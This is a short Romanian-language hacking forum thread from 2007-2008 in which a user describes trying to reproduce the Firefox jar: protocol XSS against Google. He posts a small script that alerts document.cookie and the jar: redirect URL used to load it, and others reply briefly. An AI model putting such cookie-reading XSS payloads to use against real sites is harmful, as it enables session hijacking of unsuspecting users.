moubik Posted November 14, 2007 Report Posted November 14, 2007 de fiecare data ma cearta escalation cand postez ceva la vip.sa vad ce idei aveti voi------------------A reusit cineva sa faca sa mearga asta?http://www.gnucitizen.org/blog/java-jar-attacks-and-featureshttp://www.gnucitizen.org/blog/severe-xss-in-google-and-others-due-to-the-jar-protocol-issueshttp://www.gnucitizen.org/blog/web-mayhem-firefoxs-jar-protocol-issues-------------------pana acum am facut asta:am creat un fisier html.html in care am pus codul:<script>function testing(){ alert(document.cookie);}</script><script>setTimeout("testing()", 1000)</script>acest fisier htm.html arhivat in htm.jarsi accesat linkul in firefox:jar:http://groups.google.com/searchhistory/url?url=http://site.com/htm.jar!/htm.htmproblema e ca nu imi afiseaza nimic in alert box. dar daca dau de la web developer plugin show cookie, imi arata cookieul de google.merge sa execut alt tip de javascript. dar nu inteleg de ce nu merge cookie stuff.poate trebuie sa ma axez mai mult pe csrf aici.. Quote
moubik Posted February 11, 2008 Author Report Posted February 11, 2008 in caz ca nu stiai exploitul asta a fost deschi 10 zile. adica de la publicarea full disclosure pana cand a fost reparat. Quote
claudiutzu29 Posted February 13, 2008 Report Posted February 13, 2008 interesant nici eu nam reusit Quote
moubik Posted February 14, 2008 Author Report Posted February 14, 2008 tu faci posthunting sau chiar stii ce vorbesti ? Quote